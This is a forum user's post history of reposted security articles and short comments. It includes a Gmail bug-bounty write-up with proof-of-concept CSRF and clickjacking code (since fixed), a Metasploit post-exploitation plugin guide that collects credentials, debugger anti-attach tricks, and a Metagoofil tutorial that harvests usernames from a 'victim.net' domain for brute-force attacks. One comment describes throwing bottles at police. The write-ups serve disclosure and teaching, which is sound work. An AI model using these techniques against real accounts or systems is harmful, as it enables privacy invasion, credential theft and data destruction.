Everything posted by Nytro
-
For those interested: WebGL Cross-Domain Image Stealer
-
Spam campaign uses Blackhole exploit kit to install SpyEye
by Sébastien Duquette, Malware Researcher

This article was written in collaboration with my colleague Jean-Ian Boutin.

The Wigon botnet (also known as Cutwail) is being used in a massive spam campaign. A multitude of ruses are used to get the user to click on a link: fake LinkedIn or Facebook notifications, free Windows licenses, fake deliveries etc. The links point to the Blackhole exploit kit, which attempts to install malware on the computer via unpatched security flaws. The kit attempts to use the recently added exploit CVE-2011-3544 for Java. A lot of systems have not yet been patched for this vulnerability, leaving them at risk of being compromised; screenshots of Blackhole panels published by French malware researchers Xylitol and Malekal both show infection success rates over 80%.

[Screenshot: CVE-2011-3544 now exploited by Blackhole]

The following screenshot shows a part of the decompiled code of the Java applet used by Blackhole which is exploiting the flaw.

[Screenshot: JAR file exploiting CVE-2011-3544]

One of the files dropped through this spam campaign is a SpyEye sample, detected as Win32/Spy.SpyEye Trojan by ESET. This banking trojan was configured to steal banking information from clients of BAWAG PSK, the fourth largest bank in Austria. Once a computer is infected, the malware has the ability to change the webpage content seen by the user when visiting BAWAG eBanking services. The following screenshots show that the phishing warning as well as the bank contact information is removed from the login page by the malware.

[Screenshot: Phishing warnings and contact information removed by SpyEye]

Once the user logs in, his personal information is stored and sent to the C&C server. According to the SpyEye tracker, the C&C server used by this sample is still online and is hosted in Azerbaijan.

An obfuscated JavaScript is inserted in the eBanking webpage and is used to transfer money from the user account to the cybercriminal account. This script also has the ability to hide operations that were done on the user account by modifying the content of the account balance and transfer history. The following screenshot shows a code snippet used to modify the account balance in order to hide a transfer that has already occurred. Finally, here is a screenshot showing the code used to send status information when a successful transfer occurs.

BAWAG PSK has been notified of this targeted attack. As always we advise our readers not to click links in spam or suspicious messages and to keep their installed software and antivirus up to date.

Source: Blackhole and SpyEye used in spam campaign | ESET ThreatBlog
-
Microsoft to begin silently updating IE in 2012
Angela Moscaritolo, December 15, 2011

Coming next month, Internet Explorer (IE) users will no longer have to manually upgrade their web browser. Microsoft, beginning in January, will automatically upgrade Windows customers to the latest version of IE available for their PC, Ryan Gavin, senior director of IE, said in a blog post Thursday.

The Redmond, Wash.-based computing giant's move to embrace what is known as "silent updates" follows actions already taken by Google, which pioneered the concept for its Chrome web browser in 2009, and Mozilla, which announced recently it is working on a mechanism for automatic Firefox updates.

Microsoft is aiming to better protect users from threats, such as social-engineered malware, which often targets out-of-date web browsers, Gavin said. "The web overall is better – and safer – when more people run the most up-to-date browser," he wrote. "Our goal is to make sure that Windows customers have the most up-to-date and safest browsing experience possible, with the best protections against malicious software, such as malware."

Industry experts agreed that silent updates are a step forward for security. "Silent updating is generally seen as a big improvement to security on the internet," Wolfgang Kandek, CTO of vulnerability management firm Qualys, wrote in a blog post Thursday. Kandek referenced a study conducted by researchers at the Swiss technical university ETH, which found that 97 percent of Chrome users updated their browser within three weeks of a new version release, compared to 85 percent of Firefox users, 53 percent of those using Apple Safari, and 24 percent of Opera users. Silent updates allow systems to stay secure "most of the time," take some of the onus for security off users, and shorten the window of opportunity attackers have to use known exploits against outdated browsers, according to the study.

Microsoft said that beginning in January, IE will be silently upgraded for customers who have opted in to automatic updates on the Windows Update service. It will begin first with customers in Australia and Brazil, then "take a measured approach, scaling up over time." The silent update will eliminate the pop-up window that currently allows users to opt out of or postpone available browser upgrades, Kandek said.

Users who have declined previous installations of IE8 and 9 will not be automatically updated. Additionally, customers can uninstall updates and continue to receive support for the copy of IE they purchased with Windows. Enterprise users who tightly control their patches will not be affected, as they will still have full control over the versions of their browsers, Kandek said.

Source: Microsoft to begin silently updating IE in 2012 - SC Magazine US
-
Hacking Google for Fun and Profit
Dec 14th, 2011

At the end of last year, Google announced their Vulnerability Reward Program which rewards security researchers for reported security and privacy holes in Google properties. This sounded like an interesting challenge, and I set out to find security holes. I found three, got paid, and am now in the Google Security Hall of Fame. All in all, a rewarding experience. Below I describe the three security holes that I found.

Determining if a user has emailed another user

In my opinion, this is the most subtle, but also the most disturbing, of the three bugs. As with the other bugs that I found, this was an example of Cross Site Request Forgery: the practice of convincing a user's browser to make a request on their behalf to a remote server. This type of attack generally only works when the user is logged in to the remote service. In this case, if a user is already logged into Gmail (and they usually are), a malicious website could make a series of requests for Gmail profile images and, based on the return codes, determine whether or not the visitor had communicated with another Gmail user. This worked because Gmail, as a well-intentioned privacy measure, would only show profile images to a viewer if they had had mutual contact. Here is some example code that worked at the time:

```javascript
function checkUsername(username, callback) {
  var image = new Image();
  // The profile image was only served when the two accounts had been in
  // contact, so load success or failure leaks that fact.
  image.onload = function() { callback(true); };
  image.onerror = function() { callback(false); };
  // The trailing r= parameter is a timestamp to defeat caching.
  image.src = "https://mail.google.com/mail/photos/" + username +
    "%40gmail.com?1&rp=1&pld=1&r=" + (new Date()).getTime();
}

checkUsername("fbi-reports", function(hasEmailed) {
  alert("The current visitor " + (hasEmailed ? "has" : "has not") + " emailed the FBI.");
});

checkUsername("wikileaks", function(hasEmailed) {
  alert("The current visitor " + (hasEmailed ? "has" : "has not") + " emailed WikiLeaks.");
});
```

It should be clear why this is a serious privacy concern. If you suspected someone of being a whistleblower, for example, you could make a page that probed a bunch of revealing email addresses and checked to see if any had been contacted. Luckily, Google reports that they have now fixed this bug. Cross Site Request Forgery attacks can usually be prevented by adding a CSRF token (a unique and user-specific token) to every request.

Identification of a user's Gmail address

This bug would have allowed a malicious website to determine your Google username if you were simultaneously logged into your Google account and typed anything into a seemingly innocuous web form. One of the fields in the form would actually be an iframe pointing to a public Google Document. When the user typed into the field, they would really be entering text into the Google Document, and what appeared to be their cursor in the field would actually be the Google Document insertion point. When a user typed into the field, the attacker could determine their username (and hence email address) by observing the publicly-displayed list of current document editors.

Again, this is a type of Cross Site Request Forgery, specifically known as Clickjacking, which can be especially hard to prevent. There are many types of Clickjacking, almost all of which use iframes. One approach, which I used here, is to artfully display content from a target site in such a way as to look like it's part of the current page. Another approach is to hide the iframe invisibly under the user's cursor, moving it as the cursor moves, and causing the user to click on the other site without realizing it. Google correctly used the X-XSS-Protection and X-Frame-Options headers, but some browsers do not honor these. The solution to this one is tricky, but it is generally to use frame busting, to provide appropriate headers, to use CSRF tokens, and to not expose any user information without a direct user interaction.

Deletion of all future email

The third bug that I found was a fairly severe security hole that affected a portion of Gmail users. Due to a missing CSRF token during the first step of the filter creation flow in the HTML-only version of Gmail, a malicious site could trick visitors into creating a Gmail filter that would delete all future received email. This worked in the current (at the time) version of Firefox, but not in Chrome or Safari due to their correct handling of the x-frame-options header. I didn't test it in IE.

This security hole was exploitable via a combination of a classic Cross Site Request Forgery with a Clickjacking attack. First, I discovered that it was possible to submit the first part of the filter creation flow in an iframe using JavaScript because Google had forgotten to include a unique CSRF token in the form.

```html
<form id='form' method='POST' target='iframe' action='https://mail.google.com/mail/h/ignored/?v=prf' enctype='multipart/form-data'>
  <input type=hidden name='cf1_hasnot' value='adfkjhsdf'>
  <input type=hidden name='s' value='z'>
  <input type=hidden name='cf2_tr' value='true'>
  <input type=hidden name='cf1_attach' value='false'>
  <input type=hidden name='nvp_bu_nxsb' value='Next Step'>
  <input type='submit' style='display: none'>
</form>
```

I then positioned the iframe such that the "Create Filter" button on the subsequent page would fill the frame without showing the button border; only the word "Create" was visible. A fake button was then shown around the iframe with a style that matched the Gmail style, such that when the user believed they were submitting a form with a submit button entitled "Create," they were really creating a malicious and destructive filter in Gmail. Google says this has now been fixed.

Google's Response

In all three cases, Google responded promptly to my security report and fixed the bug within a reasonable amount of time. I was given two $500 awards for the three bugs. Google generously doubled these amounts when I chose to donate them to charity, so the Athens Conservancy and the Buckeye Forest Council, two of my favorite local charities in Athens, OH, received one thousand dollars each, care of Google.

These were subtle bugs. They took trial and error to find. However, in total, I only spent a few spare evenings of my time. If Google's products, some of the most secure in the world, are susceptible to these sorts of attacks, you can bet many others are as well. Every programmer makes these mistakes sometimes. Security is too complicated for anyone to get right all of the time. Check your code!

Take your security into your own hands... or, why you should hack Google too!

Many companies try to silence security bug reporters through legal threats and sometimes even action, driving discoverers of bugs underground and onto the black market where such knowledge can do real harm. Google has set an admirable example by creating a program that is enlightened, responsive, and well-run, and I hope other companies move in the same direction. I had a great time using jsFiddle to explore and demonstrate bugs. You can do the same: check out their guidelines and do your part to improve the security of products that you love.

Enjoyed this post? You should follow me on Twitter.

Posted by Andrew Cantino, Dec 14th, 2011
Source: Hacking Google for fun and profit - andrew makes things
-
Windows 8 aims to take pain out of managing passwords
by Lance Whitney, December 15, 2011 9:23 AM PST

Juggling passwords for all the Web sites and accounts we use is a never-ending challenge, but one that Microsoft hopes to resolve in Windows 8.

Protecting yourself on the Internet typically requires the use of passwords. But that process has never been easy or truly safe. Most people either try to remember too many passwords or simply use the same passwords for all their accounts. Both approaches leave the door open for hackers to access your personal information. What's needed is a simpler yet still secure approach.

In the latest edition of the Building Windows 8 blog, Dustin Ingalls, a group program manager on Microsoft's security and identity team, explains how both Windows 8 and Internet Explorer 10 will try to adopt that simpler yet secure approach.

The upcoming new version of IE will let users store and access the account names and passwords for all of the Web sites and many of the applications they use. You can choose to have IE10 securely house your credentials and then automatically retrieve them when you visit a password-protected site. The new Metro-style apps can also tap into the same feature since developers will be able to design their apps with the ability to store and retrieve user names and passwords.

Further, as explained in a previous blog, Windows 8 will allow users to log in with their Windows Live IDs across multiple PCs. Doing so will let you synchronize the same settings and other data from one PC to another. This includes the ability to sync your login credentials to all of your Windows 8 PCs, ensuring that your passwords stay consistent on any PC you choose. As a result, you can set up a complex password for each online account without having to remember it.

"When you store credentials in conjunction with signing in to Windows with your Windows Live ID, Windows enables you to set your password for each account to something that is both complex and unique; since Windows 8 will automatically submit the credential on your behalf, you'll never need to remember it yourself. If you need to see the actual password at some point later, you can view it in the credential manager from any of your Trusted PCs," Ingalls explained.

[Screenshot: The new Windows 8 Credential Manager will help you store and retrieve your Web site passwords. (Credit: Microsoft)]

Windows 7 already offers a Credential Manager through which you can store usernames and passwords, but it looks like the version destined for Windows 8 should provide greater functionality and hopefully ease of use.

Of course, the option to allow Windows 8 and Internet 10 to manage your passwords will be totally voluntary. Users not comfortable with this approach can simply choose not to use it. And there are alternatives. Password managers such as RoboForm and LastPass already let you generate, store, and access complex passwords for all your online accounts. To be fully secure, all you need to remember is one single master password to launch the software.

But Microsoft is also looking beyond passwords by offering better support for certificates, smart cards, and other alternatives in Windows 8. Though securing your online accounts will probably never be 100 percent easy or foolproof, it's good to see Microsoft at least paying greater attention to this never-ending challenge.

Source: Windows 8 aims to take pain out of managing passwords | Microsoft - CNET News
-
Metasploit Pentest Plugin Part 1
Thursday, December 15, 2011 at 11:26AM

With the move from Rapid7 to make the framework a repository of modules and have the majority of the automation in the Community and paid versions of Metasploit, I started several months ago to write a plugin called pentest to cover some of my personal needs and those of friends who have requested them, in a single plugin (will break into individual plugins in the future and have a master one that will load all) for use from msfconsole. The main areas I have coded so far in my free time have been:

- Project - For managing of projects inside workspaces for saving data and exporting data from different tables from the Metasploit database.
- Post Automation - To automate post exploitation tasks.
- Discovery - For performing network discovery of hosts and services. (Will add discovery thru pivot in the future.)

The plugin can be found in my Github account at https://github.com/darkoperator/Metasploit-Plugins/blob/master/pentest.rb ; as time passes I will keep adding new features to it as I need them and as friends coerce me into adding new stuff for them.

The best way to add the plugin to your framework copy is to save it in your Metasploit settings folder in your home directory:

```
mkdir -p ~/.msf4/plugins
cd ~/.msf4/plugins
curl -O https://raw.github.com/darkoperator/Metasploit-Plugins/master/pentest.rb
```

Once it is downloaded there, any instance of the framework you start will have access to it. To load it is as simple as using the load command and using the help or ? command to see the additional commands that were added by the plugin:

```
msf exploit(handler) > load pentest
postauto plugin loaded.
[*] Successfully loaded plugin: pentest
msf exploit(handler) > ?

Discovery Commands
==================

    Command           Description
    -------           -----------
    network_discover  Performs a portscan and enumeration of services found for non pivot networks.

Project Commands
================

    Command  Description
    -------  -----------
    project  Command for managing projects.

Postauto Commands
=================

    Command             Description
    -------             -----------
    app_creds           Run application password collection modules against specified sessions.
    multi_cmd           Run shell command against several sessions
    multi_meter_cmd     Run a Meterpreter Console Command against specified sessions.
    multi_meter_cmd_rc  Run resource file with Meterpreter Console Commands against specified sessions.
    multi_post          Run a post module against specified sessions.
    multi_post_rc       Run resource file with post modules and options against specified sessions.
    sys_creds           Run system password collection modules against specified sessions.
```

Projects

Many times I find myself experimenting with different datasets as I develop scripts, resource files, modules etc., and other times I have data of personal clients. I tended to create workspaces inside the framework for this and run several commands and resource scripts to set up capture and exporting of data per project, so I added this command to help me manage all of that:

```
msf exploit(handler) > project -h
OPTIONS:

    -a        Export all history and DB and archive it in to a zip file for current project.
    -c        Create a new Metasploit project and sets logging for it.
    -d        Delete a project created by the plugin.
    -h        Command Help
    -l        List projects created by plugin.
    -p <opt>  Path to save archive, if none provide default ~/.msf4/archives will be used.
    -ph       Generate resource files for sessions and console. Generate time stamped session logs for current project.
    -r        Create time stamped RC files of Meterpreter Sessions and console history for current project.
    -s        Switch to a project created by the plugin.
```

Creating a new project

To create a new project is as simple as:

```
msf exploit(handler) > project -c pauldotcom
Creating DB Workspace named pauldotcom
Added workspace: pauldotcom
Spooling to file /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log...
msf exploit(handler) > > project -l
List of projects:
* pauldotcom
msf exploit(handler) > >
```

As you can see, the command created the workspace called pauldotcom and started logging using spool to ~/.msf4/logs/projects/; one can use the -l switch to list them. You might see an extra ">" added when you manipulate projects; this is due to a bug with the spool command that has been open for a while, hope it gets fixed soon.

One of the features I like the most is the ability to create a timestamped resource file that will show all the commands I have entered in a session and when each command was run; this can prove quite useful when showing a client what actions were taken and when. Here is an example if I only want to show the commands run in the console; if we had some Meterpreter sessions it would have generated timestamped resource files for those also:

```
msf exploit(handler) > > project -r
Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc
RC file written
List of projects:
* pauldotcom
msf exploit(handler) > > cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc
[*] exec: cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc

# command executed at 2011-12-15 14:06:52 UTC
project -l
# command executed at 2011-12-15 14:38:13 UTC
project -r
```

If we want a full project history that covers:

- Timestamped session commands resource file
- Timestamped Meterpreter session log of commands and output
- Timestamped console commands resource file

then the -ph option would have been used:

```
msf exploit(handler) > > project -ph
Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0735.rc
RC file written
Creating RC file for Session 1
Saving RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.rc
RC file written
Exporting Session 1 history
Saving log file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log
Log file written
msf exploit(handler) > > cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log
[*] exec: cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log

# Info:
uuid: 8chmctur
type: meterpreter
id: 1
info:
2011-12-15 15:02:57 UTC load stdapi
2011-12-15 15:03:00 UTC load priv
2011-12-15 15:04:24 UTC run checkvm
2011-12-15 15:04:36 UTC run post/windows/gather/win_privs
2011-12-15 15:04:56 UTC run priv
2011-12-15 15:05:08 UTC background
2011-12-15 15:07:20 UTC ls
2011-12-15 15:07:21 UTC Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  37888  fil   2010-01-25 18:49:24 -0400  macmet.exe
40777/rwxrwxrwx   0      dir   2010-01-17 08:59:54 -0400  ..
40777/rwxrwxrwx   0      dir   2010-02-20 14:48:26 -0400  .

2011-12-15 15:07:25 UTC getuid
2011-12-15 15:07:25 UTC Server username: TESTACCN-X6V582\Administrator
2011-12-15 15:07:28 UTC sysinfo
2011-12-15 15:07:28 UTC Computer        : TESTACCN-X6V582
2011-12-15 15:07:28 UTC OS              : Windows XP (Build 2600).
2011-12-15 15:07:28 UTC Architecture    : x86
2011-12-15 15:07:28 UTC System Language : en_US
2011-12-15 15:07:28 UTC Meterpreter     : x86/win32
2011-12-15 15:07:30 UTC background
```

Let's say we finished with a project and are going to share the info with the project manager, other team members or the client; one can create a single zip file containing:

- Spool file of the project
- Resource files for console and session commands
- Session history
- Exported database in XML format

To do this we use the -a option for archiving:

```
msf exploit(handler) > > project -a
Exporting DB Workspace pauldotcom
>> Starting export of report
>> Starting export of hosts
>> Starting export of events
>> Starting export of services
>> Starting export of credentials
>> Starting export of web sites
>> Starting export of web pages
>> Starting export of web forms
>> Starting export of web vulns
>> Finished export of report
Finished export of workspace pauldotcom to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.xml [ xml ]...
Disabling spooling for pauldotcom
Spooling disabled for archiving
Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.rc
RC file written
Creating RC file for Session 1
Saving RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.rc
RC file written
Exporting Session 1 history
Saving log file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.log
Log file written
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0514.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0735.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.xml to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3813.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3833.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3840.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0514.log to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0514.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.log to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log to archive
All files saved to /Users/carlos/.msf4/logs/archives/pauldotcom_20111215.1942.zip
MD5 for archive is 97638701e10d9ca8a4f7684bfc1f5d73
Spooling re-enabled
Spooling to file /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log...
msf exploit(handler) > > >
```

Carlos Perez

Source: Security and Networking - Blog - Metasploit Pentest Plugin Part 1

See the source; crappy vBulletin.
-
I read the first parts; it is extremely detailed, with a great many details, examples and "tricks". I think it is the best Bash scripting resource around; other people also contributed examples and ideas, and they are credited there. It also points out some differences from other shell scripting languages. Recommended.
-
Here We Go Again, Another Linux Init: Intro to systemd Tuesday, 13 December 2011 07:10 Carla Schroder In the days of yore we had a System V (SysV) type init daemon to manage Linux system startup, and it was good. It was configured with simple text files easily understood by mortals, and it was a friendly constant amid the roiling seas of change. Then came systemd, and once again we Linux users were cast adrift in uncharted waters. Why all this change? Can't Linux hold still for just a minute? Ch Ch Ch Changes Linux has been contentedly using sysvinit (System V initialization) to manage system startups for ever so many years now, except for distributions like Slackware that use the BSD-style init. SysV and BSD init are similar enough that it's easy to use either one without a lot of fuss. Then came two new init systems for Linux: Ubuntu's Upstart, first released in 2006, and systemd, born in 2009. The systemd code was written primarily by Leonard Poettering. Upstart has been the default in Ubuntu since 6.10 Edgy Eft and is available in most distros. systemd is the default init in Fedora 15 and later, and is also in most distro repos for anyone who wants to try it on their favorite Linux. Overhauling key subsystems tends to give users the jitters, because it means being forced to learn new ways to administer our systems and changing our workflow, and the prospects of essential services suffering growing pains and being less-than-reliable aren't happy-making. So what's with this new systemd thingy, and what benefits does it bring to us mere Linux users? Faster Startups The purpose of sysvinit is to launch userspace. At boot the kernel launches PID 1, the very first process to run at startup. (Run the pstree command to see a nice artistic ASCII diagram of your process tree.) It used to be that the BIOS and sysvinit were equal offenders in dragging boot times out to a minute or more. 
Both have speeded up, but sysvinit is always going to be slow because it starts processes one at a time, performs dependency checks on each one, and waits for daemons to start so more daemons can start. So why not start processes in parallel? There is a way to do this without all kinds of complexities, and that is to take advantage of the way Unix-type daemons work. Clients of Unix daemons don't need to know if the daemons they depend on are actually running — all they need is the correct Unix domain sockets to be available. What the heck are these sockets? They are inter-process communication sockets (IPC), and they are how processes on the local system talk to each other. You can see these with netstat: $ netstat -a --protocol=unixActive UNIX domain sockets (only servers)Proto RefCnt Flags Type State I-Node Pathunix 2 [ ACC ] STREAM LISTENING 4836 /var/run/dbus/system_bus_socketunix 9 [ ] DGRAM 4584 /dev/logunix 3 [ ] STREAM CONNECTED 489456 /tmp/orbit-carla/linc-aaa-0-476044c676da9unix 3 [ ] STREAM CONNECTED 489455 unix 3 [ ] STREAM CONNECTED 489452 /tmp/orbit-carla/linc-8ba-0-45fe9270a46b2[...] As you can see the sockets have inodes, following the tradition of "everything in Unix is a file." So you can perform various operations on them with standard Linux file utilities, which is a fun topic for another day. So all sockets for all daemons can be created in one step, and then all daemons in a second step. Any client requests for daemons that are not yet running will be cached in the socket buffer, and then filled when the daemons are up and running. I'm no kernel hacker so maybe I'm too easily impressed, but this seems like an ingenious and efficient use of something that has been around for decades, and preferable to trying to invent something brand-new. Hotplugging and On-Demand Services sysvinit has a static configuration and launches processes one at a time, in order. 
When we configure sysvinit we've always had to be mindful of launching them in the correct order, like remembering to start networking before starting network services. And we have to be mindful that everything we might need is launched at startup, or else we will have to start it manually, because after startup sysvinit goes to sleep and doesn't do any more. This might be adequate for simple servers, but not for desktop and mobile systems. Users roam among different networks, attach and remove all manner of devices like keyboards and headsets, audio interfaces, storage media, movies and music — thanks to Bluetooth and USB we finally have universal plug-in ports, and hotplugging devices is routine instead of an exotic adventure. Remember how, way back in olden times, we were warned to never hotplug PS/2 keyboards, mice, or IDE drives because of the risk of physical damage? Even if nothing got fried they were detected only at boot. Auto-detecting and auto-mounting removable devices has gone through a lot of stages in Linux. Remember the fun old days of manually mounting and unmounting CDs and USB sticks? And making fun of Windows and Mac refugees who thought that was weird and dumb? Well, it was weird and dumb. But Linux was still a baby, so we had to deal with it. Then there are network services that could be on-demand like file shares, printers, VNC, SSH, and so on. The bottom line is in these modern times way more stuff happens after startup, so instead of trying to anticipate everything you might need and start it all at boot, why not build a system that launches and stops processes on demand? As an everyday practical matter this seems to address one of my pet peeves, and that is how many distros launch Avahi and the Bluetooth daemons at startup. I have no use for either, so I always disable them. A small matter to be sure, but I like the idea of the computer handling these sorts of chores because I have real work to do. 
There have been a lot of attempts at subsystems to manage dynamic handling of hardware and software: HAL (hardware abstraction layer), autofs, devfs, and all kinds of other ones I've forgotten. Now we have D-Bus for advanced inter-process communications and management, such as process lifecycle management. D-Bus uses Unix domain sockets as its transport mechanism, and it seems to be here to stay (for example, KDE and Gnome run on D-Bus). So with the extra functionality in D-Bus it seems a natural expansion of duties for systemd, as PID 1, to function as the full-time Linux process babysitter, and bring the efficiencies of parallelization and dynamic resource management to a running system, rather than simply starting the system and then going to sleep until the next reboot.

This is a bare introduction to the intricacies of systemd and Linux process management. The systemd home page is a great starting point to learn more. Come back next week to learn how to manage and debug systemd on your own systems.

Source: https://www.linux.com/learn/tutorials/524577-here-we-go-again-another-linux-init-intro-to-systemd
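The socket-buffer behaviour the article leans on, as an added Python demonstration (not the article's code): a listening Unix domain socket is created before any daemon exists, a client connects and sends its request, and only then does the "daemon" accept and read it. The socket path and request bytes are constructed for the demo.

```python
"""Added example (not from the article): shows the Unix domain socket
property systemd relies on. The listening socket is created first; a client
connects and sends its request before any daemon has called accept(); the
kernel queues both the connection and the bytes until the daemon starts.
Socket path and request contents are constructed for this demo."""
import os
import socket
import tempfile


def socket_activation_demo() -> str:
    """Return the request the late-starting daemon receives.

    Step 1: the "init" process creates and binds the listening socket.
    Step 2: a client connects and writes before the daemon exists.
    Step 3: the daemon starts, accepts the queued connection and reads
            the request out of the socket buffer.
    """
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "demo.sock")  # constructed socket path

    # Step 1: init creates the socket and listens. No daemon yet.
    listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    listener.bind(path)
    listener.listen(5)  # backlog: pending connections are queued here

    # Step 2: a client shows up early. connect() succeeds because the
    # listening socket exists, even though nobody has called accept().
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client.connect(path)
    client.sendall(b"GET /status\n")  # request is buffered by the kernel
    client.shutdown(socket.SHUT_WR)   # tell the daemon the request is done

    # Step 3: the daemon "starts" and picks up the waiting connection.
    conn, _ = listener.accept()
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)

    conn.close()
    client.close()
    listener.close()
    os.unlink(path)
    os.rmdir(tmpdir)
    return b"".join(chunks).decode()


if __name__ == "__main__":
    print(socket_activation_demo())  # GET /status
```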
-
Like last year: throwing (empty) wine bottles at the police van, walking past the gendarmes shouting "Assassins, cops assassins" and so on.
-
Sysinternals: Understanding the UAC with logonsessions. Dos Attack On Window 7-[Metasploit] Hackers wanted. List of Free Sandboxes for Malware Analysis! http://real-hack.com/index.php?topic=3929.0 Suricata IDPE 1.1 Duqu Analysis & Detection Tool Released Process Hacker 2.24 xSQLScanner 1.2 and Mono Version And many others are copied from here. Trash.
-
Cracking messenger passwords
-
If anyone tests it and it works, please write a short review here. I'll try it too tonight.
-
[h=3]Debuggers Anti-Attaching Techniques - Part 1[/h][h=2]Saturday, December 10, 2011[/h]

It's been a while since I played with packing/unpacking tricks. So, I am going to choose some fancy tricks and try to explain them in detail.

The story begins when I was trying to analyze a security issue in an infamous application. I tried to attach ollydbg to the running process but the process immediately crashed. I quickly googled "anti-attach tricks" and found many useful links. In the next few posts, I am going to explain those anti-attach tricks. It would surely be better to understand how debuggers attach themselves to running processes in order to understand those tricks and perhaps innovate new ones.

The main idea behind attaching is that a debugger calls the "DebugActiveProcess" function which ends up with calling the "RtlCreateUserThread" function to create a new remote thread into the target process, with the "DbgUiRemoteBreakin" function as the new thread entry point. Thread creation occurs in the "DbgUiIssueRemoteBreakin" function, which looks something like the highlighted line in the image below.

As far as I see, one way to prevent debuggers from attaching to a process is conducted by hooking the "DbgBreakUiRemoteBreakin" or "DbgBreakPoint" function. I will write a simple executable to demonstrate that. It overwrites the first byte of the "DbgUiRemoteBreakin" function with 0xC3, opcode for retn, thus killing this kind of threads. Similarly, we can patch the "DbgBreakPoint" function. Here you can download the source code for the example above.

Trying to attach to such a process, as you can see in the image below, results in an access violation.

Bypassing this trick is pretty easy. Just use ollydbg to debug itself, set a breakpoint on the "RtlCreateUserThread" function call, and finally modify its seventh parameter to point to any int3 in the target process address space. Once execution stops at int3 (in the debugged ollydbg), kill the current thread.

This way we can bypass any API patching regardless of which function is patched in the target process address space. This bypass trick seems to be impractical. So, I decided to write a simple ollydbg plugin for this situation. The plugin simply patches the "DebugActiveProcess" function in ollydbg.exe to jump to the plugin code. The code gets the target process identifier (pid) from the stack and then writes a few instructions to the "DbgUiRemoteBreakin" function prologue in this process address space. Here you can download the plugin dll. Here is the virustotal report.

N.B. This write-up is based on analysis conducted on Windows XP SP3. Soon, I will extend it to include later operating systems.

N.B. The plugin is only tested on Windows XP SP3.

Source: waliedassar: Debuggers Anti-Attaching Techniques - Part 1
-
Metagoofil Backtrack 5 Tutorial-Metadata Analyzer Information Gathering Tool
By Irfan Shakeel

Information gathering or foot printing is the very first step of the hacking process and we have discussed so many tutorials for information gathering on backtrack 5 and on other OS like ubuntu and windows. In this article you will learn how to gather information from Metadata of public documents from victim websites and the tool is Metagoofil.

Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,odp,ods) available in the target/victim websites. It will generate a html page with the results of the metadata extracted, plus a list of potential usernames very useful for preparing a bruteforce attack on open services like ftp, pop3,web applications, vpn, etc. Also it will extract a list of disclosed PATHs in the metadata, with this information you can guess OS, network names, Shared resources, etc.

How to Install Metagoofil on Backtrack 5 r1, Ubuntu and Windows

The installation process of Metagoofil on Debian based operating systems like Ubuntu and backtrack 5 r1 is very easy, all you need to have is metagoofil, download it from here. If you are on Ubuntu and on other Linux then you need to install the dependencies like

[INDENT]root@bt:~# apt-get install extract [/INDENT]

If you are on backtrack 5 just like my case then extract is available on backtrack 5 r1, just download and extract metagoofil. For windows users you must have python to use metagoofil. The simple command to extract data from any website by using Metagoofil is:

[INDENT]# python metagoofil.py -d victim.net -l 20 -f all -o output.html -t temp [/INDENT]

Here victim.net is the domain name from which you want to extract data
-f all means you want to find all types of data from (doc,ppt,pdf,xls,odf,sdw and more)
-l result search
-o output file
-t temporary file that will be deleted after the process

The output file will give you some amazing information like:

User name (later we can use for brute force attack)
Path directory path (that will help you to understand the structure)
Creation date
more

Other Information Gathering Tutorials
FootPrinting-Information Gathering Tutorial
FootPrinting-First Step Of Ethical Hacking
Dnsmap- DNS Network Mapper
Backtrack 5- DNSenum Information Gathering Tool

